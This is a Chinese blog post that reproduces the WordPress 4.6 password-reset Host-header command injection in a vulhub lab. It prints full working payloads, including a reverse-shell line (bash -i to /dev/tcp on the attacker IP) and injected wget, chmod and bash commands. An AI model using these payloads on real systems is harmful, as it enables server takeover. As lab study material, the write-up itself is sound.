首页 > 其他分享 >WordPress4.6任意命令执行漏洞

WordPress4.6任意命令执行漏洞

时间:2023-02-02 23:13:09浏览次数:67  
标签:shell log substr WordPress4.6 spool 漏洞 directory 任意 tod

前言

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也算是一个内容管理系统(CMS)

环境搭建

docker环境 (搭建可参考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html)
靶场在vulhub即可下载
靶机centos7:192.168.31.230
攻击机kali: 192.168.31.153

导入后开启靶场
docker-compose build
docker-compose up -d

访问http://your-ip:8080/ ,安装cms系统

漏洞复现

漏洞点在忘记密码处,需要一个已知的用户可以发送数据

数据包中的Host字段的值修改为以下值,发送数据包,在/tmp下新建一个success文件
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

紧接着在kali的/var/www/html下新建一个1.txt,写入bash -i >& /dev/tcp/192.168.31.153/5566 0>&1
service apache2 start

发送shell数据包,将1.txt中的内容发送到靶机且新建一个shell文件存储
/usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt

发送数据包修改shell权限为777任意执行权限
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

发送数据包执行shell,kali监听5566端口
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

漏洞复现总结

1.该漏洞在数据包的host字段,执行的命令不能有: 、’符号
2.命令需要绝对路径
3.空格被\({substr{10}{1}{\)tod_log}}代替 /被\({substr{0}{1}{\)spool_directory}}代替
4.字段值需要全小写,且需要一个已知的用户

利用这个漏洞,发送反弹shell的文件,修改文件权限777,再用kali监听获取后台

标签:shell,log,substr,WordPress4.6,spool,漏洞,directory,任意,tod
From: https://www.cnblogs.com/BlogVice-2203/p/17083257.html

相关文章

  • 安卓应用漏洞学习case7
    安卓应用漏洞学习case7前期回顾漏洞免费实战部分-安卓应用层getLastPathSegment函数问题漏洞实战部分2-安卓应用ZipEntry对象问题实战漏洞实战部分3-ContentProvider......
  • 域渗透漏洞
    一、域内提权漏洞(CVE-2021-42287和CVE-2021-42278)1.1漏洞介绍1.1.1CVE-2021-42278主机账户的名称尾部应该有一个$(即sAMAccountName属性),但是域控对此属性并没有......
  • 关于LFI(Local File Inclusion)漏洞的利用
    LFI(localfileinclusion)漏洞是.php文件里include、require、once等函数不恰当使用引起的这个漏洞允许攻击者暴露目标服务器上的文件,在目录遍历(../)的帮助下,可以使攻击者访......
  • SaaS-API越权漏洞检测系统
    概述通过替换认证信息后重放请求,并对比数据包结果,判断接口是否存在越权漏洞特点支持HTTPS自动过滤图片/js/css/html页面等静态内容多线程检测,避免阻塞支持输出报表与完整的......
  • 漏洞免费实战部分-安卓应用漏洞学习case6
    安卓应用漏洞学习case6前期回顾漏洞免费实战部分-安卓应用层getLastPathSegment函数问题漏洞实战部分2-安卓应用ZipEntry对象问题实战漏洞实战部分3-ContentProvider......
  • 从云服务器 SSRF 漏洞到接管你的阿里云控制台
    0x00前言本文将以阿里云为例,对云服务中的一些攻防手法进行演示,首先利用Terraform进行ECSSSRF漏洞环境的搭建,然后通过实例中存在的SSRF漏洞一步步拿下该云服务账户......
  • [转载]python求 任意两平面的夹角
    1importmath#引入math模块计算角度用2classpoint(object):#定义空间点类3"""docstringforpoint"""4def__init__(self,x,y,z,name):5......
  • 快速排序:为什么右边先移动?任意枢轴值选取
    快速排序gist可运行代码Partition的含义是让某个基准元素归位排序算法——快速排序(Quicksort)基准值的三种选取和优化方法左侧基准右侧先走指针小于(严格)i<j......
  • 十进制转换为2~36的任意进制
    /***十进制转换为2~36的任意进制*/constbaseConverter=(number=12138,base=2)=>{conststack=[]constdigits='0123456789ABCDEFGHIJKLMNOP......
  • 基于tar通配符漏洞的提权方法
    以普通用户进入目标机后,若是可以运行tar指令,则可以通过以下的方法进行提权原理:tar有通配符*的漏洞,tar用通配符来压缩文件并读取文件名,若是看到有参数则将执行。 操......